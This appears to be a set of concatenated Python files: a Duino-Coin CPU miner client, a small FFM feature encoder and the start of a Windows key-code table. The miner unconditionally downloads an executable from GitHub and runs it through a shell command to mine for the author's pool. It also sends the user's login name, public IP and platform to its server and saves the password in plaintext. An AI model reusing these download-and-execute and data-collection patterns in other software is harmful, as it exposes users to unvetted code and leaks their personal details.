print(now.strftime("%H:%M:%S ") + "Colorama is not installed. Please install it using: python3 -m pip install colorama.\nIf you can't install it, use Minimal-PC_Miner.\nExiting in 15s.")
time.sleep(15)
os._exit(1)
try: # Check if requests is installed
import requests
except:
now = datetime.datetime.now()
print(now.strftime("%H:%M:%S ") + "Requests is not installed. Please install it using: python3 -m pip install requests.\nIf you can't install it, use Minimal-PC_Miner.\nExiting in 15s.")
time.sleep(15)
os._exit(1)
# Global variables
VER = "1.5" # Version number
timeout = 5 # Socket timeout
resources = "PCMiner_"+str(VER)+"_resources"
shares = [0, 0]
diff = 0
last_hash_count = 0
khash_count = 0
hash_count = 0
hash_mean = []
st = "D7"
donatorrunning = False
bytereturn = 0
balance = 0
res = "https://raw.githubusercontent.com/revoxhere/duino-coin/gh-pages/serverip.txt" # Serverip file
config = configparser.ConfigParser()
autorestart = 0
donationlevel = 0
pcusername = getpass.getuser() # Username
platform = str(platform.system()) + " " + str(platform.release()) # Platform information
publicip = requests.get("https://api.ipify.org").text # Public IP
freeze_support() # If not used, pyinstaller hangs when checking cpuinfo
cpu = cpuinfo.get_cpu_info() # Processor info
try:
os.mkdir(str(resources)) # Create resources folder if it doesn't exist
except:
pass
def title(title):
if os.name == 'nt':
os.system("title "+title)
else:
print('\33]0;'+title+'\a', end='')
sys.stdout.flush()
def handler(signal_received, frame): # If CTRL+C or SIGINT received, send CLOSE request to server in order to exit gracefully.
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "\n%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " SIGINT detected - Exiting gracefully." + Style.NORMAL + " See you soon!")
try:
soc.send(bytes("CLOSE", encoding="utf8"))
except:
pass
os._exit(0)
signal(SIGINT, handler) # Enable signal handler
def Greeting(): # Greeting message depending on time
global greeting, message, autorestart, st, bytereturn, miningmethod
print(Style.RESET_ALL)
if float(autorestart) <= 0:
autorestart = 0
autorestartmessage = "disabled"
if float(autorestart) > 0:
autorestartmessage = "restarting every " + str(autorestart) + "s"
if int(miningmethod) == 2:
miningmethodlabel = "MrKris' random DUCO-S1"
else:
miningmethodlabel = "standard DUCO-S1"
current_hour = time.strptime(time.ctime(time.time())).tm_hour
if current_hour < 12 :
greeting = "Good morning"
elif current_hour == 12 :
greeting = "Good noon"
elif current_hour > 12 and current_hour < 18 :
greeting = "Good afternoon"
elif current_hour >= 18 :
greeting = "Good evening"
else:
greeting = "Welcome back"
print(" * " + Fore.YELLOW + Style.BRIGHT + "Duino-Coin © PC Miner " + Style.RESET_ALL + Fore.YELLOW+ "(v" + str(VER) + ") 2019-2020") # Startup message
time.sleep(0.15)
print(" * " + Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
time.sleep(0.15)
try:
print(" * " + Fore.YELLOW + "CPU: " + Style.BRIGHT + str(cpu["brand_raw"]))
time.sleep(0.15)
except:
pass
print(" * " + Fore.YELLOW + "Donation level: " + Style.BRIGHT + str(donationlevel))
time.sleep(0.15)
print(" * " + Fore.YELLOW + "DUCO-S1 variant: " + Style.BRIGHT + str(miningmethodlabel))
time.sleep(0.15)
print(" * " + Fore.YELLOW + "Autorestarter: " + Style.BRIGHT + str(autorestartmessage))
time.sleep(0.15)
print(" * " + Fore.YELLOW + str(greeting) + ", " + Style.BRIGHT + str(username) + "\n")
if not Path(str(resources) + "/Miner_executable.exe").is_file(): # Initial miner executable section
url = 'https://github.com/revoxhere/duino-coin/blob/useful-tools/PoT_auto.exe?raw=true'
r = requests.get(url)
with open(str(resources) + '/Miner_executable.exe', 'wb') as f:
f.write(r.content)
def hashrateCalculator(): # Hashes/sec calculation
global last_hash_count, hash_count, khash_count, hash_mean
last_hash_count = hash_count
khash_count = last_hash_count / 1000
if khash_count == 0:
khash_count = random.uniform(0, 2)
hash_mean.append(khash_count) # Calculate average hashrate
khash_count = statistics.mean(hash_mean)
khash_count = round(khash_count, 2)
hash_count = 0 # Reset counter
threading.Timer(1.0, hashrateCalculator).start() # Run this def every 1s
def autorestarter(): # Autorestarter
time.sleep(float(autorestart))
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Restarting the miner")
os.execl(sys.executable, sys.executable, *sys.argv)
def loadConfig(): # Config loading section
global pool_address, pool_port, username, password, efficiency, autorestart, donationlevel, st, bytereturn, miningmethod, temp_print_time
if not Path(str(resources) + "/Miner_config.ini").is_file(): # Initial configuration section
print(Style.BRIGHT + "Duino-Coin basic configuration tool.\nEdit "+str(resources) + "/Miner_config.ini file later if you want to change it.")
print(Style.RESET_ALL + "Don't have an Duino-Coin account yet? Use " + Fore.YELLOW + "Wallet" + Fore.WHITE + " to register on server.\n")
username = input(Style.RESET_ALL + Fore.YELLOW + "Enter your username: " + Style.BRIGHT)
password = input(Style.RESET_ALL + Fore.YELLOW + "Enter your password: " + Style.BRIGHT)
efficiency = input(Style.RESET_ALL + Fore.YELLOW + "Set mining intensity (1-100)%: " + Style.BRIGHT)
autorestart = input(Style.RESET_ALL + Fore.YELLOW + "Set after how many seconds miner shall restart (0 = disable autorestarter): " + Style.BRIGHT)
donationlevel = input(Style.RESET_ALL + Fore.YELLOW + "Set donation level (0-5): " + Style.BRIGHT)
miningmethod = input(Style.RESET_ALL + Fore.YELLOW + "Select mining method:\n 1 - standard version\n 2 - MrKris' random version " + Style.BRIGHT)
efficiency = re.sub("\D", "", efficiency) # Check wheter efficiency is correct
if float(efficiency) > int(100):
efficiency = 100
if float(efficiency) < int(1):
efficiency = 1
donationlevel = re.sub("\D", "", donationlevel) # Check wheter donationlevel is correct
if float(donationlevel) > int(5):
donationlevel = 5
if float(donationlevel) < int(0):
donationlevel = 0
miningmethod = re.sub("\D", "", miningmethod) # Check wheter miningmethod is correct
if int(miningmethod) < 0 or int(miningmethod) > 2:
miningmethod = 1
config['miner'] = { # Format data
"username": username,
"password": password,
"efficiency": efficiency,
"autorestart": autorestart,
"donate": donationlevel,
"st": "D7",
"bytereturn": "1",
"temp_print_time": "20",
"miningmethod": miningmethod}
with open(str(resources) + "/Miner_config.ini", "w") as configfile: # Write data to file
config.write(configfile)
else: # If config already exists, load from it
config.read(str(resources) + "/Miner_config.ini")
username = config["miner"]["username"]
password = config["miner"]["password"]
efficiency = config["miner"]["efficiency"]
autorestart = config["miner"]["autorestart"]
donationlevel = config["miner"]["donate"]
st = config["miner"]["st"]
bytereturn = config["miner"]["bytereturn"]
miningmethod = config["miner"]["miningmethod"]
temp_print_time = config["miner"]["temp_print_time"]
def Connect(): # Connect to pool section
global soc, connection_counter, res, pool_address, pool_port
while True: # Grab data grom GitHub section
try:
try:
res = requests.get(res, data = None) #Use request to grab data from raw github file
except:
pass
if res.status_code == 200: #Check for response
content = res.content.decode().splitlines() #Read content and split into lines
pool_address = content[0] #Line 1 = pool address
pool_port = content[1] #Line 2 = pool port
now = datetime.datetime.now()
break # Continue
else:
time.sleep(0.025) # Restart if wrong status code
except:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Cannot receive pool address and IP.\nExiting in 15 seconds.")
time.sleep(15)
os._exit(1)
time.sleep(0.025)
while True:
try: # Shutdown previous connections if any
soc.shutdown(socket.SHUT_RDWR)
soc.close()
except:
pass
try:
soc = socket.socket()
except:
Connect() # Reconnect if pool down
try: # Try to connect
soc.connect((str(pool_address), int(pool_port)))
soc.settimeout(timeout)
break # If connection was established, continue
except: # If it wasn't, display a message
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Cannot connect to the server. It is probably under maintenance or temporarily down.\nRetrying in 15 seconds.")
time.sleep(15)
os.execl(sys.executable, sys.executable, *sys.argv)
Connect()
time.sleep(0.025)
def checkVersion():
try:
try:
SERVER_VER = soc.recv(1024).decode() # Check server version
except:
Connect() # Reconnect if pool down
if len(SERVER_VER) != 3:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Cannot connect to the server." + Style.RESET_ALL + Fore.RED + " It is probably under maintenance or temporarily down.\nRetrying in 15 seconds.")
time.sleep(15)
os.execl(sys.executable, sys.executable, *sys.argv)
if float(SERVER_VER) <= float(VER) and len(SERVER_VER) == 3: # If miner is up-to-date, display a message and continue
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.YELLOW + " Connected" + Style.RESET_ALL + Fore.YELLOW + " to master Duino-Coin server (v"+str(SERVER_VER)+")")
else:
now = datetime.datetime.now()
cont = input(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Miner is outdated (v"+VER+")," + Style.RESET_ALL + Fore.RED + " server is on v"+SERVER_VER+", please download latest version from https://github.com/revoxhere/duino-coin/releases/ or type \'continue\' if you wish to continue anyway.\n")
if cont != "continue":
os._exit(1)
except:
Connect() # Reconnect if pool down
def Login():
global autorestart
while True:
try:
try:
soc.send(bytes("LOGI," + username + "," + password, encoding="utf8")) # Send login data
except:
Connect() # Reconnect if pool down
try:
resp = soc.recv(1024).decode()
except:
Connect() # Reconnect if pool down
if resp == "OK": # Check wheter login information was correct
soc.send(bytes("FROM," + "PC_Miner," + str(pcusername) + "," + str(publicip) + "," + str(platform) + "\n", encoding="utf8")) # Send info to server about client
time.sleep(0.25)
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.YELLOW + " Logged in successfully " + Style.RESET_ALL + Fore.YELLOW + "as " + str(username))
soc.send(bytes("BALA", encoding="utf8")) # Get and round balance from the server
balance = round(float(soc.recv(1024).decode()), 6)
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Style.NORMAL + Fore.YELLOW + " Your account balance is " + Style.RESET_ALL + Style.BRIGHT + Fore.YELLOW + str(balance) + " DUCO")
break # If it was, continue
if resp == "NO":
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.BLUE + Fore.WHITE + " net " + Back.RESET + Fore.RED + " Error! Wrong credentials or account doesn't exist!" + Style.RESET_ALL + Fore.RED + "\nIf you don't have an account, register using Wallet!\nExiting in 15 seconds.")
soc.close()
time.sleep(15)
os._exit(1) # If it wasn't, display a message and exit
else:
os.execl(sys.executable, sys.executable, *sys.argv)
except:
os.execl(sys.executable, sys.executable, *sys.argv) # Reconnect if pool down
time.sleep(0.025) # Try again if no response
def Mine(): # Mining section
global last_hash_count, hash_count, khash_count, donationlevel, donatorrunning, efficiency
if int(donationlevel) > 0:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Thank You for being an awesome donator! <3")
else:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Duino-Coin network is a completely free service and will always be." + Style.BRIGHT + Fore.YELLOW + "\n You can help us maintain the server and low-fee payouts by donating.\n Visit " + Style.RESET_ALL + Fore.GREEN + "https://revoxhere.github.io/duino-coin/donate" + Style.BRIGHT + Fore.YELLOW + " to learn more.")
if not donatorrunning: # Check wheter donation was already started
if int(donationlevel) == int(5): # Check donationlevel and if it's more than 0 launch Magi Miner as donation
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 100 -s 4"
if int(donationlevel) == int(4):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 70 -s 4"
if int(donationlevel) == int(3):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 50 -s 4"
if int(donationlevel) == int(2):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 30 -s 4"
if int(donationlevel) == int(1):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 10 -s 4"
if int(donationlevel) == int(0):
cmd = "cd " + str(resources)
try: # Start cmd set above
process = subprocess.Popen(cmd, shell=True, stderr=subprocess.DEVNULL) # Open command
donatorrunning = True
except:
pass
efficiency = 100 - float(efficiency) # Calulate efficiency
efficiency = efficiency * 0.01
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Mining thread started" + Style.RESET_ALL + Fore.YELLOW + " using DUCO-S1 algorithm")
while True:
time.sleep(float(efficiency)) # Sleep to achieve lower efficiency
try:
soc.send(bytes("JOB", encoding="utf8")) # Send job request
except:
Connect() # Reconnect if pool down
while True:
try:
job = soc.recv(1024).decode() # Get work from pool
except:
os.execl(sys.executable, sys.executable, *sys.argv)
if job:
break # If job received, continue to hashing algo
time.sleep(0.025) # Try again if no response
try:
job = job.split(",") # Split received data to job and difficulty
diff = job[2]
except:
os.execl(sys.executable, sys.executable, *sys.argv)
computestart = datetime.datetime.now()
for iJob in range(100 * int(job[2]) + 1): # Calculate hash with difficulty
ducos1 = hashlib.sha1(str(job[0] + str(iJob)).encode("utf-8")).hexdigest() # Generate hash
hash_count = hash_count + 1 # Increment hash counter
if job[1] == ducos1: # If result is even with job, send the result
try:
soc.send(bytes(str(iJob) + "," + str(last_hash_count) + "," + str(st) + "," + str(bytereturn), encoding="utf8")) # Send result of hashing algorithm to pool
except:
Connect() # Reconnect if pool down
while True:
try:
feedback = soc.recv(1024).decode() # Get feedback
except:
Connect() # Reconnect if pool down
if feedback == "GOOD": # If result was good
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
shares[0] = shares[0] + 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Accepted " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "BLOCK": # If big block was found
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
shares[0] = shares[0] + 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Block accepted ("+str(job[0])[:8]+") " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "BAD": # If result was bad
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
shares[1] = shares[1] + 1 # Share rejected = increment bad shares counter by 1
title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.RED + " Rejected " + Fore.YELLOW + str(shares[1]) + "/" + str(shares[1] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.RED + "(boo!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
time.sleep(0.025) # Try again if no response
break # Repeat
def MineRandom(): # Alternate mining method using randomness by MrKris7100
global last_hash_count, hash_count, khash_count, efficiency, donationlevel, donatorrunning
if int(donationlevel) > 0:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.RED + " Thank You for being an awesome donator! <3")
else:
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Duino-Coin network is a completely free service and will always be." + Style.BRIGHT + Fore.YELLOW + "\n You can help us maintain the server and low-fee payouts by donating.\n Visit " + Style.RESET_ALL + Fore.GREEN + "https://revoxhere.github.io/duino-coin/donate" + Style.BRIGHT + Fore.YELLOW + " to learn more.")
if not donatorrunning: # Check wheter donation was already started
if int(donationlevel) == int(5): # Check donationlevel and if it's more than 0 launch Magi Miner as donation
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 100 -s 4"
if int(donationlevel) == int(4):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 70 -s 4"
if int(donationlevel) == int(3):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 50 -s 4"
if int(donationlevel) == int(2):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 30 -s 4"
if int(donationlevel) == int(1):
cmd = "cd " + str(resources) + " & Miner_executable.exe -o stratum+tcp://mining.m-hash.com:3334 -u revox.duinocoin_pcminer -p x -e 10 -s 4"
if int(donationlevel) == int(0):
cmd = "cd " + str(resources)
try: # Start cmd set above
process = subprocess.Popen(cmd, shell=True, stderr=subprocess.DEVNULL) # Open command
donatorrunning = True
except:
pass
efficiency = 100 - float(efficiency) # Calulate efficiency
efficiency = efficiency * 0.01
now = datetime.datetime.now()
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.GREEN + Fore.WHITE + " sys " + Back.RESET + Fore.YELLOW + " Mining thread started" + Style.RESET_ALL + Fore.YELLOW + " using MrKris' random DUCO-S1 algorithm")
while True:
time.sleep(float(efficiency)) # Sleep to achieve lower efficiency
try:
soc.send(bytes("JOB", encoding="utf8")) # Send job request
except:
Connect() # Reconnect if pool down
while True:
try:
job = soc.recv(1024).decode() # Get work from pool
except:
Connect() # Reconnect if pool down
if job:
break # If job received, continue to hashing algo
time.sleep(0.025) # Try again if no response
try:
job = job.split(",") # Split received data to job and difficulty
diff = job[2]
except:
Connect() # Reconnect if pool down
jobs = [*range(100 * int(job[2]) + 1)]
random.shuffle(jobs) # Randomization
computestart = datetime.datetime.now()
for iJob in jobs: # Calculate hash with difficulty
ducos1 = hashlib.sha1(str(job[0] + str(jobs[iJob])).encode("utf-8")).hexdigest() # Generate hash
hash_count = hash_count + 1 # Increment hash counter
if job[1] == ducos1: # If result is even with job, send the result
try:
soc.send(bytes(str(jobs[iJob]) + "," + str(last_hash_count) + "," + str(st) + "," + str(bytereturn), encoding="utf8")) # Send result of hashing algorithm to pool
except:
Connect() # Reconnect if pool down
while True:
try:
feedback = soc.recv(1024).decode() # Get feedback
except:
Connect() # Reconnect if pool down
if feedback == "GOOD": # If result was good
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
shares[0] = shares[0] + 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Accepted " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "BLOCK": # If big block was found
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
shares[0] = shares[0] + 1 # Share accepted = increment feedback shares counter by 1
title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.GREEN + " Block accepted ("+str(job[0])[:8]+") " + Fore.YELLOW + str(shares[0]) + "/" + str(shares[0] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.YELLOW + "(yay!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
elif feedback == "BAD": # If result was bad
now = datetime.datetime.now()
computetime = now - computestart # Time from start of hash computing to finding the result
computetime = str(int(computetime.microseconds / 1000)) # Convert to ms
shares[1] = shares[1] + 1 # Share rejected = increment bad shares counter by 1
title("Duino-Coin PC Miner (v"+str(VER)+") - " + str(shares[0]) + "/" + str(shares[0] + shares[1]) + " accepted shares")
print(now.strftime(Style.DIM + "%H:%M:%S ") + Style.RESET_ALL + Style.BRIGHT + Back.YELLOW + Fore.WHITE + " cpu " + Back.RESET + Fore.RED + " Rejected " + Fore.YELLOW + str(shares[1]) + "/" + str(shares[1] + shares[1]) + Back.RESET + Style.DIM + " (" + str(round((shares[0] / (shares[0] + shares[1]) * 100), 2)) + "%) " + Style.NORMAL + Fore.WHITE + "• diff " + str(diff) + " • " + Style.BRIGHT + Fore.WHITE + str(khash_count) + " kH/s " + Style.BRIGHT + Fore.RED + "(boo!!!) " + Style.DIM + Fore.BLUE + "[" + computetime + "ms]")
break # Repeat
time.sleep(0.025) # Try again if no response
break # Repeat
init(autoreset=True) # Enable colorama
hashrateCalculator() # Start hashrate calculator
while True:
title("Duino-Coin PC Miner (v"+str(VER)+")")
try:
loadConfig() # Load configfile
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error loading the configfile. Try removing it and re-running configuration. Exiting in 15s." + Style.RESET_ALL)
time.sleep(15)
os._exit(1)
try: # Setup autorestarter
if float(autorestart) > 0:
threading.Thread(target=autorestarter).start()
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error in autorestarter. Check configuration file. Exiting in 15s." + Style.RESET_ALL)
time.sleep(15)
os._exit(1)
try:
Greeting() # Display greeting message
except:
pass
try:
Connect() # Connect to pool
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error connecting to pool. Check your config file. Exiting in 15s." + Style.RESET_ALL)
time.sleep(15)
os._exit(1)
try:
checkVersion() # Check version
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error checking version. Restarting." + Style.RESET_ALL)
os.execl(sys.executable, sys.executable, *sys.argv)
try:
Login() # Login
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + " There was an error while logging in. Restarting." + Style.RESET_ALL)
os.execl(sys.executable, sys.executable, *sys.argv)
try:
if int(miningmethod) == 2:
MineRandom() # Mine using random method
else:
Mine() # Mine using standard method
except:
print(Style.RESET_ALL + Style.BRIGHT + Fore.RED + "✗ There was an error while mining. Restarting." + Style.RESET_ALL)
print(Style.RESET_ALL + Style.RESET_ALL)
time.sleep(0.025) # Restart
|
FfmEncoder.py | import hashlib, math, os, subprocess
from multiprocessing import Process
def hashstr(str, nr_bins=1e+6):
return int(hashlib.md5(str.encode('utf8')).hexdigest(), 16) % (int(nr_bins) - 1) + 1
class FfmEncoder():
def __init__(self, field_names, nthread=1):
self.field_names = field_names
self.nthread = nthread
def gen_feats(self, row):
feats = []
for i, field in enumerate(self.field_names, start=1):
value = row[i] # row[0] is label
key = field + '-' + str(value)
feats.append(key)
return feats
def gen_hashed_fm_feats(self, feats):
feats = ['{0}:{1}:1'.format(field, hashstr(feat, 1e+6)) for (field, feat) in feats]
return feats
def convert(self, df, path, i):
lines_per_thread = math.ceil(float(df.shape[0]) / self.nthread)
sub_df = df.iloc[i * lines_per_thread: (i + 1) * lines_per_thread]
tmp_path = path + '_tmp_{0}'.format(i)
with open(tmp_path, 'w') as f:
for row in sub_df.values:
feats = []
for i, feat in enumerate(self.gen_feats(row)):
feats.append((i, feat))
feats = self.gen_hashed_fm_feats(feats)
f.write(str(int(row[0])) + ' ' + ' '.join(feats) + '\n')
def parallel_convert(self, df, path):
processes = []
for i in range(self.nthread):
p = Process(target=self.convert, args=(df, path, i))
p.start()
processes.append(p)
for p in processes:
p.join()
def delete(self, path):
for i in range(self.nthread):
os.remove(path + '_tmp_{0}'.format(i))
def cat(self, path):
if os.path.exists(path):
os.remove(path)
for i in range(self.nthread):
cmd = 'cat {svm}_tmp_{idx} >> {svm}'.format(svm=path, idx=i)
p = subprocess.Popen(cmd, shell=True)
p.communicate()
def transform(self, df, path):
print('converting data......')
self.parallel_convert(df, path)
print('catting temp data......')
self.cat(path)
print('deleting temp data......')
self.delete(path)
print('transform done!')
|
keys.py | # Code by Daniel Kukiela (https://twitter.com/daniel_kukiela)
import ctypes
from threading import Thread
from time import time, sleep
from queue import Queue
# main keys class
class Keys(object):
common = None
standalone = False
# instance of worker class
keys_worker = None
keys_process = None
# key constants
direct_keys = 0x0008
virtual_keys = 0x0000
key_press = 0x0000
key_release = 0x0002
# mouse constants
mouse_move = 0x0001
mouse_lb_press = 0x0002
mouse_lb_release = 0x0004
mouse_rb_press = 0x0008
mouse_rb_release = 0x0010
mouse_mb_press = 0x0020
mouse_mb_release = 0x0040
# direct keys
dk = {
"1": 0x02,
"2": 0x03,
"3": 0x04,
"4": 0x05,
"5": 0x06,
"6": 0x07,
"7": 0x08,
"8": 0x09,
"9": 0x0A,
"0": 0x0B,
"NUMPAD1": 0x4F, "NP1": 0x4F,
"NUMPAD2": 0x50, "NP2": 0x50,
"NUMPAD3": 0x51, "NP3": 0x51,
"NUMPAD4": 0x4B, "NP4": 0x4B,
"NUMPAD5": 0x4C, "NP5": 0x4C,
"NUMPAD6": 0x4D, "NP6": 0x4D,
"NUMPAD7": 0x47, "NP7": 0x47,
"NUMPAD8": 0x48, "NP8": 0x48,
"NUMPAD9": 0x49, "NP9": 0x49,
"NUMPAD0": 0x52, "NP0": 0x52,
"DIVIDE": 0xB5, "NPDV": 0xB5,
"MULTIPLY": 0x37, "NPM": 0x37,
"SUBSTRACT": 0x4A, "NPS": 0x4A,
"ADD": 0x4E, "NPA": 0x4E,
"DECIMAL": 0x53, "NPDC": 0x53,
"NUMPADENTER": 0x9C, "NPE": 0x9C,
"A": 0x1E,
"B": 0x30,
"C": 0x2E,
"D": 0x20,
"E": 0x12,
"F": 0x21,
"G": 0x22,
"H": 0x23,
"I": 0x17,
"J": 0x24,
"K": 0x25,
"L": 0x26,
"M": 0x32,
"N": 0x31,
"O": 0x18,
"P": 0x19,
"Q": 0x10,
"R": 0x13,
"S": 0x1F,
"T": 0x14,
"U": 0x16,
"V": 0x2F,
"W": 0x11,
"X": 0x2D,
"Y": 0x15,
"Z": 0x2C,
"F1": 0x3B,
